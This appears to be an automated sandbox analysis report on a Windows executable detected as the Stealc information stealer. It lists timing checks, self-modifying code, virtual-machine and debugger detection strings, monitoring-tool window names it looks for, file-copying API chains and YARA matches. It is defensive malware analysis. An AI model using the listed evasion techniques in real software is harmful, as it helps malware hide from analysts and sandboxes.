Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD87A3 second address: DD87D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1675279DB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1675279DB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BE6 second address: DE8BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BF3 second address: DE8BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8BF9 second address: DE8BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE8A74 second address: DE8A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD6C second address: DEAD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD72 second address: DEAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD78 second address: DEAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA566 second address: DFA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA56E second address: DFA5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F1674F90E16h 0x00000014 jo 00007F1674F90E16h 0x0000001a jmp 00007F1674F90E27h 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 js 00007F1674F90E16h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA97D second address: DFA981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA981 second address: DFA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFA98A second address: DFA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFADB8 second address: DFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1674F90E1Fh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB397 second address: DFB39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD5B second address: DFCD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD69 second address: DFCD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD6D second address: DFCD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1674F90E21h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD8A second address: DFCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFCD8E second address: DFCD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFE494 second address: DFE4A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00D72 second address: E00D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E22h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E00F1A second address: E00F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DAFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E01038 second address: E01042 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02AEE second address: E02B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F1675279DA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F1675279DB2h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02B15 second address: E02B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E02B1D second address: E02B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1675279DAEh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F1675279DA6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4033C second address: 4E4036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Ch 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1674F90E20h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4036B second address: 4E40380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4042B second address: 4E4045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov di, A7CEh 0x00000011 pop edx 0x00000012 mov esi, 18B7830Bh 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E4045E second address: 4E40464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E40464 second address: 4E40479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E40479 second address: 4E4047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B719FA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D13958 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D26394 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DA3622 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_009238B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00924910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0091E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0091ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00924570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00923EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_009116D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0091DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0091BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00911160 GetSystemInfo,ExitProcess,

0_2_00911160

Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1747007538.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,00000000

0_2_009145C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00929860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00929750 mov eax, dword ptr fs:[00000030h]

0_2_00929750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_009278E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00929600

Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: TProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00927B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00927980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00927850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00927A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1541160
Product:	CloudBasic
Start time:	14:17:04
Start date:	24.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	efb3596cf052ae112e2b81b16870436e
SHA1:	266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
SHA256:	73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by